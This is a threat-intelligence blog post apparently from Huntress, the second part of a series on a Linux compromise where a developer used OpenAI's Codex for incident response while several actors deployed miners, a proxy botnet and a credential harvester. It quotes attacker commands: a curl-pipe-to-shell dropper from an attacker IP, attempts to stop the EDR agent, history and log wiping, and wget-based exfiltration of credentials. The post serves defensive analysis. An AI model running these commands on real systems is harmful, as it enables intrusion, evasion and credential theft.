Don’t let overlooked obligations become incidents. Learn how.
Utility navigation bar redirect icon
Portal LoginSupportBlogContact
Search
Close search
Huntress Logo in Teal
  • Platform Overview
    Managed EDR

    Get full endpoint visibility, detection, and response.

    Managed EDR

    Get full endpoint visibility, detection, and response.

    Managed ITDR: Identity Threat Detection and Response

    Protect your Microsoft 365 and Google Workspace identities and email environments.

    Managed ITDR: Identity Threat Detection and Response

    Protect your Microsoft 365 and Google Workspace identities and email environments.

    Managed SIEM

    Managed threat response and robust compliance support at a predictable price.

    Managed SIEM

    Managed threat response and robust compliance support at a predictable price.

    Managed Security Awareness Training Software

    Empower your teams with science-backed security awareness training.

    Managed Security Awareness Training Software

    Empower your teams with science-backed security awareness training.

    Managed ISPM

    Continuous Microsoft 365 and identity hardening, managed and enforced by Huntress experts.

    Managed ISPM

    Continuous Microsoft 365 and identity hardening, managed and enforced by Huntress experts.

    Managed ESPM

    Proactively secure endpoints against attacks.

    Managed ESPM

    Proactively secure endpoints against attacks.

    Integrations
    Integrations
    Support Documentation
    Support Documentation
    See Huntress in Action

    Quickly deploy and manage real-time protection for endpoints, email, and employees - all from a single dashboard.

    Huntress Cybersecurity
    See Huntress in Action

    Quickly deploy and manage real-time protection for endpoints, email, and employees - all from a single dashboard.

    Huntress Cybersecurity
  • Threats We Stop
    Phishing
    Phishing
    Business Email Compromise
    Business Email Compromise
    Ransomware
    Ransomware
    Infostealers
    Infostealers
    View Allright arrowView Allright arrow
    Industries We Serve
    Education
    Education
    Financial Services
    Financial Services
    State and Local Government
    State and Local Government
    Healthcare
    Healthcare
    Law Firms
    Law Firms
    Manufacturing
    Manufacturing
    Utilities
    Utilities
    View Allright arrowView Allright arrow
    Tailored Solutions
    MSPs
    MSPs
    Resellers
    Resellers
    SMBs
    SMBs
    Compliance
    Compliance
    What Gets Overlooked Gets Exploited

    Most days, nothing happens. But one day, something will.

    Huntress Cybersecurity
    Cybercriminals Have Evolved

    Get the intel on today’s cybercriminal groups and learn how to protect yourself.

    Huntress Cybersecurity
  • Pricing
  • Community Series
    The Product Lab

    Shape the next big thing in cybersecurity together.

    The Product Lab

    Shape the next big thing in cybersecurity together.

    Fireside Chat

    Real people. Real perspectives. Better conversations.

    Fireside Chat

    Real people. Real perspectives. Better conversations.

    Tradecraft Tuesday

    No products, no pitches – just tradecraft.

    Tradecraft Tuesday

    No products, no pitches – just tradecraft.

    _declassified

    Exposing hidden truths in the world of cybersecurity.

    _declassified

    Exposing hidden truths in the world of cybersecurity.

    Resources
    Upcoming Events
    Upcoming Events
    Ebooks
    Ebooks
    On-Demand Webinars
    On-Demand Webinars
    Videos
    Videos
    Whitepapers
    Whitepapers
    Datasheets
    Datasheets
    Cybersecurity Education
    Cybersecurity 101
    Cybersecurity 101
    Cybersecurity Guides
    Cybersecurity Guides
    Threat Library
    Threat Library
    Real Tradecraft, Real Results
    Real Tradecraft, Real Results
    2026 Cyber Threat Report
    2026 Cyber Threat Report
    The Huntress Blog
    Codex Red: Untangling a Linux Incident With an OpenAI Twist (Part 2)
    Huntress Cybersecurity
    Codex Red: Untangling a Linux Incident With an OpenAI Twist (Part 2)
    Huntress Cybersecurity
    axios npm Compromise: The Ultimate Supply Chain Scaries
    Huntress Cybersecurity
    axios npm Compromise: The Ultimate Supply Chain Scaries
    Huntress Cybersecurity
    Nightmare-Eclipse Tooling Moves From Public PoC to Real-World Intrusion
    Huntress Cybersecurity
    Nightmare-Eclipse Tooling Moves From Public PoC to Real-World Intrusion
    Huntress Cybersecurity
  • Why Huntress

    Go beyond AI in the fight against today’s hackers with Huntress Managed EDR purpose-built for your needs

    Huntress Cybersecurity
    Why Huntress

    Go beyond AI in the fight against today’s hackers with Huntress Managed EDR purpose-built for your needs

    Huntress Cybersecurity
    The Huntress SOC

    24/7 Security Operations Center

    The Huntress SOC

    24/7 Security Operations Center

    Reviews

    Why businesses of all sizes trust Huntress to defend their assets

    Reviews

    Why businesses of all sizes trust Huntress to defend their assets

    Case Studies

    Learn directly from our partners how Huntress has helped them

    Case Studies

    Learn directly from our partners how Huntress has helped them

    Community

    Get in touch with the Huntress Community team

    Community

    Get in touch with the Huntress Community team

    Compare Huntress
    Bitdefender
    Bitdefender
    Blackpoint
    Blackpoint
    Breach Secure Now!
    Breach Secure Now!
    Crowdstrike
    Crowdstrike
    Datto
    Datto
    SentinelOne
    SentinelOne
    Sophos
    Sophos
    Compare Allright arrowCompare Allright arrow
  • HUNTRESS HUB

    Login to access top-notch marketing resources, tools, and training.

    Huntress Cybersecurity
    HUNTRESS HUB

    Login to access top-notch marketing resources, tools, and training.

    Huntress Cybersecurity
    Partners
    MSPs

    Join our partner community to deliver expert-led managed security.

    MSPs

    Join our partner community to deliver expert-led managed security.

    Resellers

    Partner program designed to grow your cybersecurity business.

    Resellers

    Partner program designed to grow your cybersecurity business.

    Tech Alliances

    Driving innovation through global technology Partnerships

    Tech Alliances

    Driving innovation through global technology Partnerships

    Microsoft Partnership

    A Level-Up for Your Business Security

    Microsoft Partnership

    A Level-Up for Your Business Security

  • Press Release
    Huntress Announces Collaboration with Microsoft to Strengthen Cybersecurity for Businesses of All Sizes
    Huntress Cybersecurity
    Press Release
    Huntress Announces Collaboration with Microsoft to Strengthen Cybersecurity for Businesses of All Sizes
    Huntress Cybersecurity
    Our Story

    We're on a mission to shatter the barriers to enterprise-level security.

    Our Story

    We're on a mission to shatter the barriers to enterprise-level security.

    Newsroom

    Explore press releases, news articles, media interviews and more.

    Newsroom

    Explore press releases, news articles, media interviews and more.

    Meet the Team

    Founded by former NSA Cyber Operators. Backed by security researchers.

    Meet the Team

    Founded by former NSA Cyber Operators. Backed by security researchers.

    Careers

    Ready to shake up the cybersecurity world? Join the hunt.

    Careers

    Ready to shake up the cybersecurity world? Join the hunt.

    Awards
    Awards
    Contact Us
    Contact Us
  • Portal Login
  • Support
  • Blog
  • Contact
  • Search
  • Get a Demo
  • Start for Free
Portal LoginSupportBlogContact
Search
Close search
Get a Demo
Start for Free
HomeBlog
Codex Red: Untangling a Linux Incident With an OpenAI Twist (Part 2)
Published:
April 22, 2026

Codex Red: Untangling a Linux Incident With an OpenAI Twist (Part 2)

By:
James Northey
John Hammond
Share icon
Glitch effectGlitch effectGlitch effect

Acknowledgments: Special thanks to Tanner Filip and Lindsey O’Donnell-Welch for their contributions to this blog and research.


Recently, the Huntress Security Operations Center (SOC) came across a strange incident: a developer was using OpenAI's Codex AI agent to assist in creating two applications – but they were also using Codex to respond to malicious behavior on their Linux system. As we outlined in the first part of our two-part blog series, Codex helped mask symptoms, such as the loud fan noise from a cryptominer – but it failed to remediate the threat fully, and complicated triage for the SOC due to the noise from the commands it generated.

Then, the user installed the Huntress agent, and the SOC kicked into gear.

Our story picks up from the SOC’s perspective as they embarked on their investigation into this incident, navigating a complex investigation with three simultaneous storylines: a legitimate developer building web applications, multiple threat actors deploying various payloads and persistence mechanisms, and an AI agent creating plenty of noise in the background.


Key takeaways

  • SOC analysts found at least two distinct threat actors had simultaneously compromised the endpoint. The first (“Actor A”), which was discussed in part one of this blog series, involved a cryptominer. The second, which was tracked in two potentially disparate clusters of activity, involved a botnet with several components (“Actor B”) and a credential harvester (“Actor C”). 

  • Threat actors deployed eight different persistence mechanisms, including cron jobs, systemd services, and UDEV rules. They were also able to exfiltrate 15 categories of sensitive data, including SSH keys, cloud credentials, API tokens, and system metadata.

  • Upon further investigation, we found that the activity is consistent with exploitation of CVE-2025-55182 (also known as "React2Shell"). One of the user's applications (which was ironically vibecoded) was running Next.js 15.4.6 and React 19.1.0, both in the affected range.

  • All the while during the incident, the end user continued relying on Codex for DFIR and remediation assistance. This incident highlighted the limitations of relying solely on AI-driven security responses and the need for comprehensive Managed Endpoint Detection and Response (EDR) telemetry and human expertise.

In part one, we saw how Actor A's cryptominer - the /var/tmp/systemd-logind binary - had been silently mining Monero to a private pool at 62.60.246[.]210:443 since boot. When the user complained about loud fans on March 19, Codex only masked the symptoms by CPU throttling rather than diagnosing the threat, and the cryptominer remained active. 


New quest: the SOC has entered the chat

As we mentioned in the first part of this blog series, on March 20, shortly after the Huntress agent was installed mid-compromise, the SOC responded to a series of alerts on the endpoint.


Figure 1: Detections that fired off after the Huntress agent was installed

While working through the investigation, SOC analysts were able to figure out that some of the commands in Figure 1 above were actually legitimate. They were Codex commands, from the legitimate end user trying to troubleshoot strange behavior on the system, that were picked up by EDR detections. 

However, the other detections were, in fact, malicious. As SOC analysts dove deeper into them, they uncovered multiple adversaries targeting the victim system.

Here is where our story picks up again.


Player two has joined: enter a multi-revenue botnet

As seen in Figure 1, after the agent was installed Huntress immediately detected that the attacker had executed the following:

curl -fsSLk http://162.55.234[.]175:4082/workersh | sh

This was actually a dropper from the second threat actor (we’ll call them Actor B), which then executed the following:

  1. Cron persistence (30 3,15 * * *) running payloads installsh (miner installer) and dnser (an ELF binary) twice daily
  2. systemd user services (.arpupdate.service, .dnsupdate.service) running from /dev/shm/
  3. Direct execution deploying: XMRig cryptominer (fkkkf), as well as residential proxy and bandwidth-selling services (EarnFM, Repocket). Notably, there were key differences between this cryptominer activity and the one from Actor A, including the mining pools (while Actor A’s malware was mining Monero to a private pool at 62.60.246[.]210:443, Actor B’s miner fkkkf connected to pool.supportxmr[.]com:3333).

This script dropped all the files the threat actor needed, then set up persistence to run what appeared to be a multi-revenue botnet. The botnet included a combination of XMR mining (fkkkf), residential proxy services (Repocket), and bandwidth selling (EarnFM).

Additionally, the actor executed multiple log cleanup commands (i.e. history -c 2>/dev/null), which can be seen in Figure 1.

About an hour after the first miner was removed by Codex, a base64-encoded payload then ran via an activity cluster that we are tracking as Actor C. Notably, while the activity in this cluster came from the same IP address as that of Actor B (147.45.41[.]25), indicating the two clusters may be affiliated, the tradecraft here began to look markedly different. 


Achievement unlocked: mass data exfiltration

Figure 2: Decoded payload downloading next stage from 147.45.41[.]25

This script is a dropper designed for reliability across different Linux environments. It first unset LD_PRELOAD and LD_LIBRARY_PATH to evade detection and prevent interference from library injection. The script then attempted to download content from 147.45.41[.]25 using five different fallback methods: a custom netcat-based HTTP client, wget, curl, Python's urllib, and finally Perl's socket library. Each method tried until one succeeded, ensuring the payload executed even on minimal or hardened systems where standard tools may be unavailable.

Once downloaded, the content was immediately piped to a shell for execution, with all errors suppressed. This was Actor C's dropper that then fetched the next payload.

The ensuing payload is a cross-platform persistence script. The script attempted privilege escalation via passwordless sudo, then deployed multiple persistence mechanisms: /etc/cron.d/auto-upgrade (a malicious cron job disguised as system updates, executing daily at midnight to download payloads from 0x1x2x3[.]top C2), and UDEV rules that triggered on network interface changes to re-execute the malware. 

It also included anti-competitive features that scan /proc for rival cryptominers on port 8235 and kill them, plus file immutability locking (chattr +i on Linux, chflags uchg on BSD/macOS) to prevent removal. 

Separately, the threat actor deployed yet another XMR cryptominer (FH8a7d7M) to /tmp/; this one connected to a private mining pool at 57.129.119[.]218:19999.

With persistence and C2 established, the threat actor first attempted to stop the Huntress agent (via systemctl stop huntress-updater.service), and then we saw mass exfiltration of sensitive files. The script /tmp/.e2933fc3b.sh (SHA256: 781c19b56fbdb17284707f9026e107f639e5447df7df3b248a5d5a50c4b0806c) performed the collection.


Figure 3: Attempt to stop Huntress agent, and portion of data exfiltration


  • SSH materials: ~/.ssh/ directory (private keys, config, known_hosts, authorized_keys)

  • Shell history: ~/.bash_history, ~/.zsh_history

  • Cloud credentials: ~/.aws/, ~/.kube/config

  • Application secrets: .env files in /home/[REDACTED-USER]/[REDACTED-APP]/ and project directories

  • Git credentials: .git-credentials

  • API tokens: Token files and bearer tokens from application configs

  • System metadata: /proc/ directory (process info, cmdlines, environment variables)

  • Cron config: /var/spool/cron/crontabs/[REDACTED-USER]

  • Cloud metadata: Live queries to 169.254.169.254 (AWS/Azure/GCP metadata endpoints)

  • Host information: System details (uname, hostname, user info, network config)

  • File inventory: Generated list of all discovered sensitive files (found.txt)

  • Completion marker: Script-generated completion flag (done.txt)

All 15 files were exfiltrated via wget --post-file to 172.86.127[.]128:8080.


Difficulty increased: threat actor returns

On April 6, Huntress detected a barrage of activity from this impacted Linux environment:

  • 28+ repeated wget downloads of installsh to /tmp/corn
  • 16+ repeated wget downloads of dnser to /tmp/defunctr
  • All from 162.55.234[.]175:4082
  • All executed with -q flag (quiet mode)


Figure 4: Example of follow-on activity on April 6

The attacker again attempted to disable the Huntress EDR agent using systemctl stophuntress-updater.service. Five minutes later, they cleared bash history with history -c, then executed a base64-encoded payload that triggered mass log clearing across the system.

The attacker wiped over 40 log files using targeted rm -f commands, erasing auth logs, kernel logs, systemd journals, firewall logs, package manager logs, CUPS logs, and unattended-upgrades logs. Huntress detected each deletion, but the forensic timeline was destroyed, forcing the SOC to rely solely on detected signals and process history. 


Game over? Insert coin to continue

Throughout this investigation, one question remained unanswered. How did the threat actors originally get in? Because the Huntress agent was installed mid-compromise, we never had full visibility into the initial access vector. The earliest forensic signals we could rely on were those captured after malware deployment, leaving the true origin of the intrusion unknown.

But as we were finalizing this blog, on April 16, the rebuilt host was again reinfected. The activity is consistent with exploitation of CVE-2025-55182 (also known as "React2Shell"), a critical CVSS 10.0 unauthenticated remote code execution vulnerability in the React Server Components Flight protocol. One of the vibecoded applications was running Next.js 15.4.6 and React 19.1.0, both in the affected range.

The attack followed a now-familiar pattern. A shell process downloaded and executed a script directly from 162.55.234[.]175:4082, the same Actor B infrastructure seen throughout this incident, confirming this is the same threat actor returning to the host after it was remediated. Furthermore, the same base64-encoded infostealer payloads followed, pulling further malware from 172.245.159[.]216, again consistent with previously observed infrastructure.

The reinfection shows that incomplete remediation advice, whether AI-driven or otherwise, leaves residual footholds. As the underlying vulnerability was never patched, the application remained exposed, and the same threat actor walked back through the same door. Until the root cause is addressed, detection and cleanup alone are not sufficient.


New minigame: untangle the threat actors

From the SOC perspective, this incident presented a unique challenge. Analysts needed to sort through three simultaneous storylines: a developer creating web apps and at least two threat actors dropping payloads and persistence – all while an AI created plenty of noise in the background.

Below is a breakdown of some of the SOC’s overall findings once the investigations had been fully untangled. 

Actor A (Crypto Miner)

  • Old compromise, likely from 2024 (binary compiled Aug 2024)

  • Simple @reboot crontab persistence

  • Private mining pool at 62.60.246[.]210:443

Actor B (Multi-Revenue Botnet)

  • Infrastructure: 162.55.234[.]175:4082 (Hetzer, Germany)

  • Revenue streams: XMR mining, bandwidth selling (EarnFM), residential proxy (Repocket), dnser binary (purpose unknown, possibly DNS tunnel)

    • Monero wallet: 48jWtAsev4V9iDeN5TK5PQVNGhnJJR35yiJfJ1tbA3f73ZCiiarUxc4RMU4hNMsd1Udjbe1tCiBeFbx216UXXJzLB98dmJR
    • Pool password: "poop"
    • EarnFM API key: 3090ae2d-e49e-4626-a752-9222911f4970
    • Repocket email: workoutoffice@protonmail[.]com
  • Persistence: eight distinct mechanisms 

    • user cron, systemd user services, watchdog scripts, miner daemonization, dropper re-execution, UDEV rules, root cron if sudo available

  • Anti-competitor moves: miner installer (pkill -9 xmrig) creates watchdog script (/dev/health), aimed at killing rival miners every 45 seconds

Actor C (Credential Harvester, likely affiliated with Actor B)

  • Staging IPs: 147.45.41[.]25:80 (shared with Actor B), 172.245.159[.]216:80 

  • Exfiltration server: 172.86.127[.]128:8080

  • C2 domain: 0x1x2x3[.]top


Codex's report card: “C+”

This case demonstrates that while AI can be a valuable tool in the cybersecurity toolkit, it cannot replace the experience, contextual awareness, and investigative judgment of human security professionals. Figure 5 shows the “wins” and “misses” of Codex from this incident. 


Figure 5: Codex’s wins and fails in this incident


Here are some of the main limitations on Codex leading to its “misses.”

  1. Timing and visibility gaps: AI tools can only respond to what they can observe at the moment of execution. The credential exfiltration happened during a period when Codex wasn't actively monitoring; this is why live telemetry is critical.
  2. Privilege constraints: Codex operated without root access and likely couldn't inspect /etc/cron.d/, UDEV rules in /etc/udev/rules.d/, or systemd system services. 
  3. The race condition: While Codex was killing miners and removing crontabs, Actor B's workers' payload was simultaneously installing multiple different persistence mechanisms. By the time the "remediation" was completed and Codex was happy, a second attacker had already re-established control through channels Codex had never checked.


Leaderboard MVP: the SOC analyst

This incident is a critical lesson about the role of AI in cybersecurity and DFIR investigations.

AI is an assistant, not a replacement: Codex successfully identified some threats and implemented useful security hardening measures. However, it lacked contextual awareness, privileged access, continuous monitoring capabilities, and a background in threat intelligence needed for comprehensive incident response.

Additionally, the user’s use of Codex led to increasing complexity for SOC analysts. They needed to spend time distinguishing between legitimate Codex-generated commands and actual attacker activity, as the Codex command looks remarkably similar to attacker reconnaissance.

Live telemetry is critical. With logs wiped and the agent installed mid-compromise, we were limited in our investigation. The only way the SOC could reconstruct this incident was through real-time EDR telemetry since the agent's installation and the few logs that remained. Without live process monitoring and command-line detection, this investigation would have been nearly impossible.

Finally, the context provided by understanding what the user prompted Codex to do was essential for distinguishing its activity from attacker commands. This required reviewing Codex session logs, chat history, and correlating timestamps. It was a necessary but time-consuming exercise in modern-day forensics.


Conclusion

This incident represents a preview of what future security investigations might look like. As more users adopt AI assistants and attempt to use them for security troubleshooting, SOC analysts will increasingly need to deconflict legitimate AI-generated activity from actual threats.

The endpoint in this incident was ultimately secured through a combination of:

  • Real-time managed EDR telemetry from the Huntress agent

  • Expert SOC analysis untangling multiple simultaneous threat actors

  • Comprehensive cleanup addressing all persistence mechanisms

  • Security hardening recommendations for the partner, including updating the version of React/Next.js

While this incident shows that AI assistants can help identify some issues and recommend remediations, comprehensive DFIR investigations require specialized tools, continuous managed EDR telemetry, and above all human experience and expertise. When in doubt, leave it to the pros before the threat actors have time to dump all your credentials and establish eight different ways to return.


Indicators of Compromise 

Item

Description

62.60.246[.]210:443

Private Monero mining pool used by Actor A’s /var/tmp/systemd-logind cryptominer.

pool.supportxmr[.]com:3333

Monero mining pool used by Actor B’s fkkkf XMRig miner.

162.55.234[.]175:4082

HTTP server used by Actor B as staging/C2 for workersh, installsh, dnser and other botnet payloads.

147.45.41[.]25:80

Staging IP contacted by Actor C’s base64-encoded dropper to fetch next-stage payloads.

172.245.159[.]216:80

Staging/C2 IP used in Actor C’s follow-on malware delivery, shared with Actor B infrastructure.

172.86.127[.]128:8080

HTTP server used as the exfiltration endpoint for archives posted via wget --post-file.

57.129.119[.]218:19999

Private Monero mining pool used by the FH8a7d7M cryptominer in /tmp/.

0x1x2x3[.]top

C2 domain used by Actor C’s root-level cron job /etc/cron.d/auto-upgrade to pull payloads.

48jWtAsev4V9iDeN5TK5PQVNGhnJJR35yiJfJ1tbA3f73ZCiiarUxc4RMU4hNMsd1Udjbe1tCiBeFbx216UXXJzLB98dmJR

Monero wallet associated with Actor B’s mining operation.

3090ae2d-e49e-4626-a752-9222911f4970

EarnFM API key used by Actor B’s bandwidth-selling component.

workoutoffice@protonmail[.]com

Repocket account email used for the residential proxy/bandwidth-selling portion of Actor B’s botnet.

/var/tmp/systemd-logind

XMRig-based cryptominer binary used by Actor A, running since boot.

@reboot crontab invoking /var/tmp/systemd-logind

Persistence entry keeping Actor A’s miner running on reboot.

workersh

Initial shell dropper fetched from 162.55.234[.]175:4082 that installs Actor B components.

installsh

Miner installer script dropped by workersh and re-downloaded to /tmp/corn via cron.

dnser

ELF binary repeatedly downloaded to /tmp/defunctr; likely DNS-tunneling/C2 component of Actor B botnet.

fkkkf

XMRig cryptominer binary run by Actor B, connecting to pool.supportxmr[.]com:3333.

~/.config/systemd/user/.arpupdate.service

Hidden user-level systemd service providing persistence for Actor B payloads.

~/.config/systemd/user/.dnsupdate.service

Second hidden systemd user service used by Actor B for persistence.

/dev/health

Watchdog script created by Actor B to scan for and kill competing miners roughly every 45 seconds.

/etc/cron.d/auto-upgrade

Malicious root cron masquerading as system auto-updates, pulling payloads from 0x1x2x3[.]top / related C2.

/tmp/.e2933fc3b.sh

Data-collection and exfiltration script that gathers 15 categories of sensitive data before upload.

FH8a7d7M

Additional XMR cryptominer binary (third miner) mining to 57.129.119[.]218:19999.

781c19b56fbdb17284707f9026e107f639e5447df7df3b248a5d5a50c4b0806c

SHA256 hash of /tmp/.e2933fc3b.sh credential-harvesting and exfiltration script.

systemctl stop huntress-updater.service

Command used repeatedly by attackers to attempt to stop the Huntress agent before or during exfiltration.



Categories
Threat Analysis
ChatGPT logoChatGPTOpens in new tabClaude logoClaudeOpens in new tabPerplexity logoPerplexityOpens in new tabGoogle Gemini logoGoogle AIOpens in new tab
AI sparkle iconSummarize This Page
ChatGPT logoChatGPTOpens in new tabClaude logoClaudeOpens in new tabPerplexity logoPerplexityOpens in new tabGoogle Gemini logoGoogle AIOpens in new tab

What's your social profile giving away?

On May 20 (12pm EST), join Truman Kain and Caitlin Sarian ("Cybersecurity Girl") for the latest edition of _declassified and learn how attackers turn social media into intel.
Register now
Share
Facebook iconTwitter X iconLinkedin iconDownload icon
Glitch effect

You Might Also Like

  • Gone Phishing: An Analysis of a Targeted User Attack

    Get an inside look at how threat actors use phishing and social engineering tactics to target users and infiltrate organizations.
  • That “Friendly” Prompt is ClickFix

    That "friendly" prompt is a ClickFix scam. Learn about this advanced social engineering tactic that tricks users into running malicious code on their own systems, and why security resilience is your winning bet.
  • Endpoint Security In a macOS World

    It would take hours to cover everything endpoint security can do, but this blog covers it in a few aspects: a high-level overview, a deeper dive and how detection engineers can leverage it.
  • How Huntress Can Complement – Not Complicate – Your Security Stack

    Learn why Huntress is built to complement—not complicate—our partners’ daily operations and deliver on our mission to secure the 99%.
  • Hackers No Hashing: Randomizing API Hashes to Evade Cobalt Strike Shellcode Detection

    Hackers could be outsmarting preventive tools by making trivial changes to default settings. We dive into our research in this blog.
  • Top Hacker Tradecraft That Caught Our Eye in 2020

    We take a look back at some of the more interesting — and innovative — hacker tradecraft we saw over the course of 2020.
  • Thwarting Financial Fraud: Shutting Down Hackers in Microsoft 365

    In this blog, explore how Huntress caught an attempt at financial fraud through business email compromise (BEC) in Microsoft 365.
  • Advanced Persistent Threat Targeting Vietnamese Human Rights Defenders

    Huntress identified an intrusion against a non-profit supporting Vietnamese human rights that’s likely spanned years. Jump in as we provide a thorough analysis of this malicious threat actor.

Sign Up for Huntress Updates

Get insider access to Huntress tradecraft, killer events, and the freshest blog updates.
Privacy • Terms
By submitting this form, you accept our Terms of Service & Privacy Policy
Huntress Managed Security PlatformManaged EDRManaged EDR for macOSManaged EDR for LinuxManaged ITDRManaged SIEMManaged Security Awareness TrainingManaged ISPMManaged ESPMBook a Demo
PhishingComplianceBusiness Email CompromiseEducationFinanceHealthcareManufacturingState & Local Government
Managed Service ProvidersResellersIT & Security Teams24/7 SOCCase Studies
BlogResource CenterCybersecurity 101Upcoming EventsSupport Documentation
Our CompanyLeadershipNews & PressCareersContact Us
Huntress white logo

Protecting 242k+ customers like you with enterprise-grade protection.

Privacy PolicyCookie PolicyTerms of UseCookie Consent
Linkedin iconTwitter X iconYouTube iconInstagram icon
© 2025 Huntress All Rights Reserved.

Join the Hunt

Get insider access to Huntress tradecraft, killer events, and the freshest blog updates.

By submitting this form, you accept our Terms of Service & Privacy Policy